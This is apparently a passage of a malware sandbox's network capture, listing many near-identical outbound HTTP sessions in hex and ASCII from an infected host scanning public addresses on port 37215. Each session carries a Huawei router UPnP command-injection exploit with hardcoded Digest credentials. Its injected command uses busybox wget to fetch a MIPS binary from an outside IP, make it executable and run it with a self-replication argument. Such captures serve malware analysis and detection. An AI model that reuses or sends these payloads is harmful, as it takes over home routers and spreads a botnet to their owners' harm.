70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          820192.168.2.1547320197.218.63.12737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.676719904 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          821192.168.2.1544288197.55.99.16137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.681546926 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          822192.168.2.154152841.48.22.22837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.681580067 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          823192.168.2.1552060114.49.123.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.681593895 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          824192.168.2.1545992197.100.174.6837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.681651115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          825192.168.2.1533108157.108.203.9237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.681677103 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          826192.168.2.1560320197.168.211.20437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.682048082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          827192.168.2.1555018157.241.115.14737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.682073116 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          828192.168.2.1556490157.73.18.25337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.682127953 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          829192.168.2.155167241.123.137.7737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.682167053 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          830192.168.2.1560012197.29.21.21637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.682267904 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
